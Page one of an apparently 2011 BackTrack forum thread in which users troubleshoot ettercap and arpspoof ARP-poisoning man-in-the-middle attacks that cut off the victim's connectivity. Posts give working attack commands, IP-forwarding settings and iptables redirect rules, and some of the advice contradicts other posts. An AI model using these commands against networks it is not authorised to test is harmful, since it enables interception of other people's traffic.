Page 1 of 2 12 LastLast
Results 1 to 10 of 15

Thread: MitM attack causes victim connection loss

  1. #1
    Just burned his ISO
    Join Date
    Oct 2011
    Posts
    3

    Default MitM attack causes victim connection loss

    Whenever performing a MitM attack through my tool of choice whether it be Ettercap text mode or arpspoof, the victim VM(BT5R1) loses internet connection. I have searched this topic thoroughly but am obviously missing something. The attack is being performed by BT5R1 Gnome 64bit on an identical VM(VMware) which is using a bridged connection that also replicates physical network state. This attack is being done via eth0 since I do not own an external USB wireless card.

    The commands I used for ettercap are as follows

    # ettercap -TQM ARP:REMOTE -i eth0 /10.0.0.1/ /10.0.0.2/

    10.0.0.1 being the gateway obviously and .2 being the victim VM

    I didn't enable IP forwarding for this due to ettercap's automation of this. Also tried with ip forwarding even though it's a bit redundant. In addition to ip forwarding, I've enabled IP tables in etter.conf as well as dropping the ec_uid/gid to 0(I don't know what this does). I've also read in another thread to un-comment ip chains, which I also tried but to no avail. I've tried installing a different version of ettercap but got the same problem. And of course when I tried this attack with arpspoof, i enabled ip forwarding with the echo "1" > /proc/sys/net/ipv4/ip_forward

    Now I confirmed that the victim VM is in fact ARP poisoned via ARP tables and/or Wireshark. I just can't figure out why they lose connectivity

    Any help would be appreciated. Sorry if I forgot to mention any other critical details that would help in assessing the problem.

  2. #2
    Senior Member ShadowMaster's Avatar
    Join Date
    Jul 2011
    Location
    /root
    Posts
    189

    Default Re: MitM attack causes victim connection loss

    Based on your question I'm assuming you're testing on a wireless network. So. Here's my experience with the same problem. I've successful used the MiTM attack from vmware bt5 to vmware windows xp and 7 and physical win7 via ethernet ports, but when I tried the same attack via wifi physical(but vmware's eth0 bridge), it failed miserably. So... I troubleshot. Long story short, if you used an external card, it should work find. I have an ALFA AWUSO36H, and I, the forums, and the rest of the general web, recommend it highly. It only costs like 25-30 bucks. Not sure why it fails to do it the other way, I assume it's a problem with the..... Actually I have no idea.... But if you do find out why, please let me know.
    World Domination is such an ugly phrase. I prefer the term World Optimization.

  3. #3
    Just burned his ISO
    Join Date
    Oct 2011
    Posts
    3

    Default Re: MitM attack causes victim connection loss

    but when I tried the same attack via wifi physical(but vmware's eth0 bridge), it failed miserably.
    This attack was actually performed through eth0 on both the attacker and victim. Disabled wireless on the attacker via wireless switch.

  4. #4
    Just burned his ISO
    Join Date
    Oct 2011
    Posts
    1

    Default Re: MitM attack causes victim connection loss

    Quote Originally Posted by daquon View Post
    I confirmed that the victim VM is in fact ARP poisoned via ARP tables and/or Wireshark. I just can't figure out why they lose connectivity
    For what its worth, I had the EXACT same issue using the same setup. I was able to use a physical host for my back track system (not a VM) and ettercap mitm via arp poisioning worked fine.

    From some preliminary searching around on google I suspect vmware may be doing something in their network bridging of the backtrack VM that is causing our problem.

    Heres another with a similar issue
    http://www.backtrack-linux.org/forum...re-player.html

  5. #5
    Senior Member
    Join Date
    Jul 2011
    Posts
    236

    Default Re: MitM attack causes victim connection loss

    Quote Originally Posted by daquon View Post
    Whenever performing a MitM attack through my tool of choice whether it be Ettercap text mode or arpspoof, the victim VM(BT5R1) loses internet connection. I have searched this topic thoroughly but am obviously missing something. The attack is being performed by BT5R1 Gnome 64bit on an identical VM(VMware) which is using a bridged connection that also replicates physical network state. This attack is being done via eth0 since I do not own an external USB wireless card.

    The commands I used for ettercap are as follows

    # ettercap -TQM ARP:REMOTE -i eth0 /10.0.0.1/ /10.0.0.2/

    10.0.0.1 being the gateway obviously and .2 being the victim VM

    I didn't enable IP forwarding for this due to ettercap's automation of this. Also tried with ip forwarding even though it's a bit redundant. In addition to ip forwarding, I've enabled IP tables in etter.conf as well as dropping the ec_uid/gid to 0(I don't know what this does). I've also read in another thread to un-comment ip chains, which I also tried but to no avail. I've tried installing a different version of ettercap but got the same problem. And of course when I tried this attack with arpspoof, i enabled ip forwarding with the echo "1" > /proc/sys/net/ipv4/ip_forward

    Now I confirmed that the victim VM is in fact ARP poisoned via ARP tables and/or Wireshark. I just can't figure out why they lose connectivity

    Any help would be appreciated. Sorry if I forgot to mention any other critical details that would help in assessing the problem.
    ec_uid/gid being 0 makes it run root so to speak is my understanding (0 being the UID for root). Kind of pointless since you would want to do this as root anyways, but that is the answer to the question.

    As far as messing with etter.conf, I would recommend leaving IP chains commented and leaving IP tables uncommented. You definately want only ONE or the OTHER uncommented.

    I am so happy to finally see an intelligent thread to where the author actually has READ the friggin man pages. Thank you!!! Yes, to affirm what you say: Ettercap in Offensive mode (Defaulted) will automatically forward packets for you. Why other people have not grasped this concept is beyond me. As well, if you wanted to run ettercap and NOT have it forward packets for you you could issue a -u within the syntax, the caveat here is that Unoffensive mode makes ettercap a sniffer and nothing more; it loses its ability to dynamically interact with the packet flow; granted, you should still be able to use certain plugins like autoadd and dns_spoof, but as far as the MITM goes, you lose that. What you want to avoid is Forcing the kernel to refoward after you have issued the ettercap command, per the man pages; this might cause "Double Forwarding" confusing the heck out of the network. That being said, if you have not issued a -u within the syntax; DO NOT issue 1 to IP forwarding.

    As far as the victim losing connectivity, what do you mean??? Since it's a Physical Connection from what I understand, do you mean they lose their DHCP lease? I will edit this post a little later, gotta do some IRL stuff.
    V/r,
    Snafu
    Pffbt..[quote]I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not because it doesn't like me... Or feels threatened by me.. Or thinks I'm a smart ass.. [/quote]

  6. #6
    Very good friend of the forum maverik35's Avatar
    Join Date
    Sep 2009
    Location
    Debian land
    Posts
    734

    Default Re: MitM attack causes victim connection loss

    Well, ettercap will forward packets even in non-offensive mode, just ettercap -Tqi ethX, that is enough to forward..It is specified in the man pages...
    Also in man pages, it is said:
    ettercap needs root privileges to open the Link Layer sockets. After the initialization phase, the root privs are not needed anymore, so ettercap
    drops them to UID = 65535 (nobody). Since ettercap has to write (create) log files, it must be executed in a directory with the right permissions
    (e.g. /tmp/). If you want to drop privs to a different uid, you can export the environment variable EC_UID with the value of the uid you want to
    drop the privs to (e.g. export EC_UID=500) or set the correct parameter in the etter.conf file.
    So, it need to be root to open link layer sockets (2 layer in OSI model, please refer to it in wiki)..Once open it has no need to be root, so you have to tell ettercap who are privileges going to drop to...Why?, because ettercap has to write the log files..So you have to use your id..Just open a terminal and type "id". It will probably will say 1000..
    Why your id...Because I'm the owner of the account, me, so I can have access to logs..So change the etter.conf EC_UID = 1000 or whatever your id is..

    I've set EC_UID to 0 and it avoid victim connections...

    Try it....

    Hope it helps...

  7. #7
    Senior Member
    Join Date
    Jul 2011
    Posts
    236

    Default Re: MitM attack causes victim connection loss

    Quote Originally Posted by maverik35 View Post
    Well, ettercap will forward packets even in non-offensive mode, just ettercap -Tqi ethX, that is enough to forward..It is specified in the man pages...
    ettercap -Tqui wlan0 will place ettercap in Unoffensive mode....Therefore leaving the forwarding to the user...That is per the man pages. Aside from that, very nice explanation; I learned something from it.
    V/r,
    Snafu
    Pffbt..[quote]I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not because it doesn't like me... Or feels threatened by me.. Or thinks I'm a smart ass.. [/quote]

  8. #8
    Just burned his ISO
    Join Date
    Oct 2011
    Posts
    3

    Default Re: MitM attack causes victim connection loss

    As far as the victim losing connectivity, what do you mean??? Since it's a Physical Connection from what I understand, do you mean they lose their DHCP lease? I will edit this post a little later, gotta do some IRL stuff.
    Sorry for being too vague. The actual DHCP lease hasn't expired and remains active for the whole duration. I guess a better way to explain it would be that the connection 'times out'? When I try and load a page on the victim machine, it gets stuck 'Looking up www.xyz.com'.

    So, it need to be root to open link layer sockets (2 layer in OSI model, please refer to it in wiki)..Once open it has no need to be root, so you have to tell ettercap who are privileges going to drop to...Why?, because ettercap has to write the log files..So you have to use your id..Just open a terminal and type "id". It will probably will say 1000..
    Why your id...Because I'm the owner of the account, me, so I can have access to logs..So change the etter.conf EC_UID = 1000 or whatever your id is..
    I'm kind of confused about what you're trying to say. I understand the fact that ettercap needs to have root privileges to open the Data Link Layer(For the ARP protocol). But you say that after it has accomplished opening the Data Link layer, it needs to drop root privileges to your own ID(1000 being a non root user?) because root privileges are unnecessary at this point. The thing is, most of us are running BT as root already so our ID would be 0(root). And you said that having the root privileges dropped to a root user avoids victims connections. Are you saying that I should be running ettercap in BT as a non root user?

  9. #9
    Just burned their ISO
    Join Date
    Sep 2011
    Posts
    22

    Default Re: MitM attack causes victim connection loss

    Hmm. I've had the same issue and it's been driving me nuts.

    I've been able to get it to work intermittently.

    If I target a single IP, I get better results, but typically it still kills the connection.

    I had changed the UID in etter.conf to 0. And Ettercap disables IP_Forwarding upon starting. I've yet to determine if that really matters. Try:

    Code:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    ettercap -Tq -M arp:remote // //
    cat /proc/sys/net/ipv4/ip_forward
    It's always gone back to 0 for me.

    As for IP Tables. Ettercap alters those too.

    The odd thing is, I've tried it via VMWare Fusion in 2 senses: Using a USB Wifi Adapter (AWUS036H) and Using the Bridged connection. I've had the bridged connection work, and I've had the usb connection work. I've even had ONE successful attempt using Ettercap on my Android (via VM) against a computer in our house. I've also tried natively on my Mac using MacPorts. Installed and set up. I can sniff, but once I use MiTM, Internet dies.

    There's gotta be a way to get this to work reliably. If anyone has anything else to recommend, please chime in.

  10. #10
    Just burned his ISO
    Join Date
    Dec 2011
    Posts
    1

    Unhappy Re: MitM attack causes victim connection loss

    I am getting this same problem . I am on a wired LAN which is behind a proxy and am using BT5 64-bit. Now when I launch ettercap
    ettercap -i eth0 -T -q -M arp:remote /victims_ip/ /gateway_ip/

    the victim's computer loses internet connectivity . I tried these lines

    redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

    in etter.conf also tried setting ec_uid to 0 but still no luck . The victims computer is running windows 7 . I checked the arp table of victim to check whether it was poisoned or not using command arp- a and looking for the mac address associated with the gateways ip address and it was mine. Also when I launch the plugin chk_poison it gives me no poisoning at all . I think my lappy is not forwarding the packets it is recieving.

    for this I tried setting ip_forwarding to 1 but it was of no use as when I launch ettercap it automatically turns ip_forwarding off. can anybody help me in getting what I am doing wrong ??

    thank you

Page 1 of 2 12 LastLast

Similar Threads

  1. fake AP vs MITM attack
    By SecureSurfer in forum Beginners Forum
    Replies: 1
    Last Post: 01-07-2011, 01:32 AM
  2. Etternet kills victim internet connection
    By kkrapul in forum Beginners Forum
    Replies: 3
    Last Post: 11-29-2010, 07:17 PM
  3. MITM attack on Mac OS X victim?
    By Miguel7729 in forum Beginners Forum
    Replies: 2
    Last Post: 09-16-2010, 10:47 AM
  4. MiTM Attack? How to detect
    By t-alla in forum OLD Newbie Area
    Replies: 9
    Last Post: 01-09-2010, 05:47 PM
  5. SSL Rebinding & EV SSL MITM attack
    By htons139 in forum OLD BackTrack 4 Package and feature Requests
    Replies: 1
    Last Post: 08-21-2009, 08:38 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •